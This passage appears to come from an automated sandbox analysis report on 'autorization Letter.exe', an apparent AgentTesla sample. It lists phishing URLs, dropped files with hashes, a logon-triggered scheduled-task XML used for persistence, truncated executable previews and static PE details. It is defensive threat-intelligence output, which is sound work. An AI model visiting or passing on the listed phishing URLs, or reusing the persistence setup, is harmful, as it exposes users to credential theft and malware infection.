                                            https://dwr.yoh.mybluehost.me/wp-content/plugins/A/sdh/TU17HLK/Get hashmaliciousUnknownBrowse
                                            • 50.6.153.157
                                            https://abre.ai/k8hXGet hashmaliciousUnknownBrowse
                                            • 50.6.153.157
                                            http://nky.beb.mybluehost.me/new/auth/entrar.phpGet hashmaliciousUnknownBrowse
                                            • 50.6.153.4
                                            https://turkiyecumhuriyetiziraatbankasi.com/Get hashmaliciousUnknownBrowse
                                            • 162.240.37.219
                                            https://c81df1b32e6c3c5e06e82397233e2695.crimachado.com.br/wehrgiwfbfeifef/djbfhokefbwuwrjow/djhfeokhrwihfekljd/cmVnaXN0cmF0b3JAc3Uuc2U=Get hashmaliciousHTMLPhisherBrowse
                                            • 108.179.252.203
                                            https://aac4b0887827b3598989c48a201d0420.crimachado.com.br/wehrgiwfbfeifef/djbfhokefbwuwrjow/djhfeokhrwihfekljd/bnpheWVkaUBzdGMuY29tLnNhGet hashmaliciousHTMLPhisherBrowse
                                            • 108.179.252.203

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exerMT103SwiftCopyoFPayment.exeGet hashmaliciousAgentTeslaBrowse
                                              Shipping Document.exeGet hashmaliciousAgentTeslaBrowse
                                                COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                                                  DHL- CBJ520818836689.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                    DHL- CBJ520818836689.exeGet hashmaliciousAgentTeslaBrowse
                                                      Shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                                        Shipping doc.exeGet hashmaliciousAgentTeslaBrowse
                                                          80c619d931fa4e5c89fe87aac0b6b143.exeGet hashmaliciousXWormBrowse
                                                            Rejected Shipping Documents compiled PL pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                              Public Holiday mem_Notice 2024.exeGet hashmaliciousAgentTeslaBrowse

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GUIVTme.exe.log

                                                                Download File
                                                                Process:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):142
                                                                Entropy (8bit):5.090621108356562
                                                                Encrypted:false
                                                                SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                                MD5:8C0458BB9EA02D50565175E38D577E35
                                                                SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\autorization Letter.exe.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\autorization Letter.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1216
                                                                Entropy (8bit):5.34331486778365
                                                                Encrypted:false
                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                Malicious:true
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tIFjYTCo.exe.log

                                                                Download File
                                                                Process:C:\Users\user\AppData\Roaming\tIFjYTCo.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1216
                                                                Entropy (8bit):5.34331486778365
                                                                Encrypted:false
                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):2232
                                                                Entropy (8bit):5.380285623575084
                                                                Encrypted:false
                                                                SSDEEP:48:+WSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//8M0Uyus:+LHxvCsIfA2KRHmOugw1s
                                                                MD5:3DE8C237AE45317874CDD4A22928CCED
                                                                SHA1:5FDA59AE6DF07FE8DDAA0D3FDC17D78752C9955A
                                                                SHA-256:C7784FBFD2FC129A8F16665768CA3C17B9BCF080FFD48516E826A6B18F629A06
                                                                SHA-512:BC5397E31BE411D3154A61F270B23B51DF7F7E3812255D5F64CD16E0E62DA4C51BEDE994915055F65F49977D282BF0A5F9C66E0AD8CE869137606B703CC0E042
                                                                Malicious:false
                                                                Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11g0nfzk.wjm.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vlyn5gt.xhc.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5cbcryey.s5i.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5cc2xxa3.4ha.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5kk0dmj.pnk.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idf5mf53.ilr.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osp51fi5.hyv.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbbwxrea.5tm.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\tmp1162.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Roaming\tIFjYTCo.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):1581
                                                                Entropy (8bit):5.104782811711384
                                                                Encrypted:false
                                                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOxvn:cgergYrFdOFzOzN33ODOiDdKrsuTCv
                                                                MD5:55D30B34C86EA4E93D9FF780B8C450FA
                                                                SHA1:761F4FE2CE32B3D912A1898D57DBBEBF8F8B005B
                                                                SHA-256:857FA04642FE7003EB7D4AC07216F000A4D1595451F21589F63AFA7790AF15FC
                                                                SHA-512:D807ADBEFA9CDE8D40379113CA36EBF1EC72D43BBD52A11347897C1DB2E8B8B62F5000241759517F2DB1AC29D6E01DD81AF441897AED0D1AA1F56D86B3AE3169
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                C:\Users\user\AppData\Local\Temp\tmpF639.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\autorization Letter.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):1581
                                                                Entropy (8bit):5.104782811711384
                                                                Encrypted:false
                                                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOxvn:cgergYrFdOFzOzN33ODOiDdKrsuTCv
                                                                MD5:55D30B34C86EA4E93D9FF780B8C450FA
                                                                SHA1:761F4FE2CE32B3D912A1898D57DBBEBF8F8B005B
                                                                SHA-256:857FA04642FE7003EB7D4AC07216F000A4D1595451F21589F63AFA7790AF15FC
                                                                SHA-512:D807ADBEFA9CDE8D40379113CA36EBF1EC72D43BBD52A11347897C1DB2E8B8B62F5000241759517F2DB1AC29D6E01DD81AF441897AED0D1AA1F56D86B3AE3169
                                                                Malicious:true
                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe

                                                                Download File
                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:modified
                                                                Size (bytes):45984
                                                                Entropy (8bit):6.16795797263964
                                                                Encrypted:false
                                                                SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                                MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                                SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                                SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                                SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: rMT103SwiftCopyoFPayment.exe, Detection: malicious, Browse
                                                                • Filename: Shipping Document.exe, Detection: malicious, Browse
                                                                • Filename: COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exe, Detection: malicious, Browse
                                                                • Filename: DHL- CBJ520818836689.pdf.exe, Detection: malicious, Browse
                                                                • Filename: DHL- CBJ520818836689.exe, Detection: malicious, Browse
                                                                • Filename: Shipping documents.exe, Detection: malicious, Browse
                                                                • Filename: Shipping doc.exe, Detection: malicious, Browse
                                                                • Filename: 80c619d931fa4e5c89fe87aac0b6b143.exe, Detection: malicious, Browse
                                                                • Filename: Rejected Shipping Documents compiled PL pdf.exe, Detection: malicious, Browse
                                                                • Filename: Public Holiday mem_Notice 2024.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                                                                C:\Users\user\AppData\Roaming\tIFjYTCo.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\autorization Letter.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):841224
                                                                Entropy (8bit):7.631178244358003
                                                                Encrypted:false
                                                                SSDEEP:24576:4nIY7owVZppDU/4p2v213ZYip6rhrCWKjMA:4t7o6Zp9L2v2TYXrhrCWkMA
                                                                MD5:457F6CB01C6F3F7922AC201F70111AE5
                                                                SHA1:934E5433FC83AF812DB461E3E7748C311E19B1BC
                                                                SHA-256:CA471400001374BDDF5E6FF03DB7889CF53BD516FE64209FAEE8B894B454C3C5
                                                                SHA-512:2403C0AB282E085B54AB5689FBAE2328CF16D19BDEC2EDB24E32AD6BAB79BDF2ABA26AA52A48B44F9F573E390636A1401C7F7B30104EDA131D4BEC9776D06A9B
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<=...............0.................. ... ....@.. ....................................@.....................................O.... ...................6..........8...p............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H........;..h+......-... g................................................s....}.....s....}......}.....(.......(.....*...0..C........r...p(..........+)......{.....o......{....o.....o....&...X....i2.*..0...........r...p.*.0............{....o......{....o......{....o......{....o......{....o.......{......(...+...(.....o.....(.....( .....s*.........(.............o!...("...&...*.......n..{......&..(#....*...0..|...........{....o....r...p($.....,...+2.{....o......(%........,...{....

                                                                C:\Users\user\AppData\Roaming\tIFjYTCo.exe:Zone.Identifier

                                                                Download File
                                                                Process:C:\Users\user\Desktop\autorization Letter.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                \Device\ConDrv

                                                                Download File
                                                                Process:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1141
                                                                Entropy (8bit):4.442398121585593
                                                                Encrypted:false
                                                                SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                                                MD5:6FB4D27A716A8851BC0505666E7C7A10
                                                                SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                                                SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                                                SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                                                Malicious:false
                                                                Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.631178244358003
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:autorization Letter.exe
                                                                File size:841'224 bytes
                                                                MD5:457f6cb01c6f3f7922ac201f70111ae5
                                                                SHA1:934e5433fc83af812db461e3e7748c311e19b1bc
                                                                SHA256:ca471400001374bddf5e6ff03db7889cf53bd516fe64209faee8b894b454c3c5
                                                                SHA512:2403c0ab282e085b54ab5689fbae2328cf16d19bdec2edb24e32ad6bab79bdf2aba26aa52a48b44f9f573e390636a1401c7f7b30104eda131d4bec9776d06a9b
                                                                SSDEEP:24576:4nIY7owVZppDU/4p2v213ZYip6rhrCWKjMA:4t7o6Zp9L2v2TYXrhrCWkMA
                                                                TLSH:6805F1A079328843D53B4FBC8823D2B54AB49C4E7113A29B71EC7E373C5928D594B67E
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<=................0.................. ... ....@.. ....................................@................................

                                                                File Icon

                                                                Icon Hash:074dd8a2a2ce7107

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4a05ee
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x8BCF3D3C [Sat Apr 30 07:37:32 2044 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Authenticode Signature

                                                                Signature Valid:false
